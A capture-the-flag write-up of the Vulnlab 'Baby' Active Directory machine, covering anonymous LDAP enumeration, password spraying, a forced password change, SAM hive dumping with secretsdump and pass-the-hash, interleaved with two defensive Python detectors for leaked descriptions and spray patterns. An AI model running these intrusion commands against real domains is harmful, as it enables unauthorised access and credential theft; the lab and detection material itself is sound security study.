Baby

Easy machine

Last updated 4 months ago

Enumeration

Nmap

Ldapsearch

Domain = baby.vl

ldapsearch -H ldap://$IP -x -b "DC=BABY,DC=VL"

The anonymous simple bind (-x with no credentials) works, so I now have a lot of results that are useful to analyse.

About users (& a password inside the description of a user ⚠️):

dev (group)
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
it (group)
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell (password: **********)
Caroline.Robinson
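The description field leak above is the kind of thing an AD admin should be auditing for before an attacker finds it. The following is an added example, not code from the original post: it parses ldapsearch LDIF output (including folded continuation lines and `::` base64 values, which ldapsearch emits for non-ASCII text) and flags user objects whose description contains a password-like hint. The LDIF sample, the descriptions and the `svc.test` account are constructed for the demo; only the account names are taken from the enumeration above.

```python
import base64
import re
from typing import Dict, List, Tuple

# Words that commonly mark a credential left in a description field (English and French).
SECRET_HINT = re.compile(
    r"\b(password|passwd|passwort|passe|pass|pwd|mdp|credentials?)\b", re.I
)

# Constructed sample in ldapsearch LDIF form. The descriptions and the
# "svc.test" account are hypothetical; the base64 value is what ldapsearch
# would print for a description containing non-ASCII characters.
_B64_DESC = base64.b64encode("mot de passe initial : Été2024!".encode("utf-8")).decode("ascii")
SAMPLE_LDIF = f"""\
# extended LDIF
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: user
sAMAccountName: Teresa.Bell
description: Temporary account, initial password
  set to Winter2024!

dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
objectClass: user
sAMAccountName: Hugh.George
description: Developer, joined 2021

dn: CN=svc test,OU=it,DC=baby,DC=vl
objectClass: user
sAMAccountName: svc.test
description:: {_B64_DESC}

dn: CN=dev,OU=groups,DC=baby,DC=vl
objectClass: group
sAMAccountName: dev
description: Dev team, password resets via helpdesk

search: 2
result: 0 Success
"""


def unfold(text: str) -> List[str]:
    """Join LDIF continuation lines (a leading space) back onto the previous line."""
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Parse ldapsearch output into one attribute dict per entry; 'attr:: value' is base64."""
    entries: List[Dict[str, List[str]]] = []
    current: Dict[str, List[str]] = {}
    for line in unfold(text):
        if line.startswith("#"):
            continue
        if line == "":
            if current:
                entries.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(key, []).append(value)
    if current:
        entries.append(current)
    return entries


def looks_like_secret(text: str) -> bool:
    """Keyword hint, or a token with the shape of a complex password (upper, lower, digit, 8+)."""
    if SECRET_HINT.search(text):
        return True
    for tok in text.split():
        if len(tok) >= 8 and re.search(r"[a-z]", tok) and re.search(r"[A-Z]", tok) and re.search(r"\d", tok):
            return True
    return False


def find_exposed_descriptions(ldif_text: str) -> List[Tuple[str, str]]:
    """Return (sAMAccountName, description) for user objects whose description looks like a credential."""
    hits: List[Tuple[str, str]] = []
    for entry in parse_ldif(ldif_text):
        if "user" not in entry.get("objectClass", []):
            continue  # groups, OUs and the trailing search/result block are skipped
        name = entry.get("sAMAccountName", ["?"])[0]
        for desc in entry.get("description", []):
            if looks_like_secret(desc):
                hits.append((name, desc))
    return hits


if __name__ == "__main__":
    for name, desc in find_exposed_descriptions(SAMPLE_LDIF):
        print(f"{name}: {desc}")
```

Run it against a real `ldapsearch ... > dump.ldif` by passing the file contents to `find_exposed_descriptions`. The keyword list is deliberately short; the complexity heuristic catches values that carry no keyword at all, and the `objectClass` filter keeps group descriptions that merely mention passwords out of the report.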

SMB

Access denied as guest.

We will try with our new creds: Teresa.Bell:**********

RPC

I try to enumerate domain users but get an access denied.

Also tried with my new creds, but not successful.

Kerbrute

After spraying that password across all the users, I found the real creds:

Compromised user = Caroline.Robinson@baby.vl:**********
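A spray like the one above leaves a clear signature on the domain controller: many different accounts failing Kerberos pre-authentication from one client address in a short time. The following is an added example, not part of the original post, that runs that detection over constructed log lines modelled on the fields of Windows Security event 4771 (time, event id, account, client address, failure code; 0x18 is a wrong password, 0x6 an unknown principal). The addresses and timings are made up; the account names are the ones enumerated above.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample: time|event id|account|client address|failure code.
# 10.10.14.5 cycles through many accounts in a few seconds (spray);
# 192.168.1.20 is one user getting their own password wrong (not a spray).
SAMPLE_EVENTS = """\
2024-04-03T10:00:01|4771|Jacqueline.Barnett|10.10.14.5|0x18
2024-04-03T10:00:01|4771|Ashley.Webb|10.10.14.5|0x18
2024-04-03T10:00:02|4771|Hugh.George|10.10.14.5|0x18
2024-04-03T10:00:02|4771|Leonard.Dyer|10.10.14.5|0x18
2024-04-03T10:00:03|4768|nosuchuser|10.10.14.5|0x6
2024-04-03T10:00:03|4771|Ian.Walker|10.10.14.5|0x18
2024-04-03T10:00:04|4771|Connor.Wilkinson|10.10.14.5|0x18
2024-04-03T10:00:04|4771|Joseph.Hughes|10.10.14.5|0x18
2024-04-03T10:05:10|4771|Kerry.Wilson|192.168.1.20|0x18
2024-04-03T10:05:40|4771|Kerry.Wilson|192.168.1.20|0x18
2024-04-03T10:06:05|4771|Kerry.Wilson|192.168.1.20|0x18
2024-04-03T10:06:30|4771|kerry.wilson|192.168.1.20|0x18
"""


def parse_event(line: str) -> Dict[str, object]:
    ts, event_id, account, src, code = line.strip().split("|")
    return {
        "ts": datetime.fromisoformat(ts),
        "event_id": int(event_id),
        "account": account.lower(),  # AD account names are case-insensitive
        "src": src,
        "code": code.lower(),
    }


def detect_password_spray(
    lines: List[str], window_seconds: int = 120, min_accounts: int = 5
) -> Dict[str, int]:
    """Map client address -> largest number of distinct accounts that failed
    pre-auth with a wrong password (4771 / 0x18) from it inside any sliding window."""
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    by_src: Dict[str, list] = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4771 and ev["code"] == "0x18":
            by_src[ev["src"]].append(ev)

    window = timedelta(seconds=window_seconds)
    alerts: Dict[str, int] = {}
    for src, evs in by_src.items():
        lo = 0
        for hi in range(len(evs)):
            # advance the left edge until every event in evs[lo:hi+1] fits the window
            while evs[hi]["ts"] - evs[lo]["ts"] > window:
                lo += 1
            distinct = {e["account"] for e in evs[lo:hi + 1]}
            if len(distinct) >= min_accounts:
                alerts[src] = max(alerts.get(src, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for src, n in detect_password_spray(SAMPLE_EVENTS.splitlines()).items():
        print(f"possible password spray from {src}: {n} distinct accounts")
```

The distinct-account count is what separates a spray from an ordinary lockout scenario: the second source fails four times but against a single account, so it never trips the threshold. The 4768 / 0x6 line is ignored by this rule; counting those per source is the matching rule for user enumeration.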

Crackmapexec

The account requires a password change before we can connect with it.

We can use smbpasswd.py:

smbpasswd.py -newpass 'Makito123!' 'baby.vl'/'Caroline.Robinson':'**********'@"$IP"

We now have: Caroline.Robinson:Makito123!

Domain Enumeration

Doing some domain enumeration with BloodHound & PowerShell.

We can confirm that the user Caroline.Robinson has backup privileges, so we can get the SAM & SYSTEM hives and then crack or pass the Admin hash.

Hashes

> secretsdump -sam SAM.save -system SYSTEM.save LOCAL

Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b5??????????????????????:8d992faed3??????????????????????:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

But the Admin hash is of no use here: it is the local administrator from the SAM, so we can't use this account to connect to the DC.

We also need the ntds.dit.

After following the blog, I can log in with the hash using Evil-WinRM and get the root flag.

PWNED 🏆

FzF_StormZ just pwned Baby @ Vulnlab!

References

  • https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secret
  • Backup Operator Privilege Escalation (BorderGate)
  • Dumping Domain Controller Hashes Locally and Remotely (Red Teaming Experiments)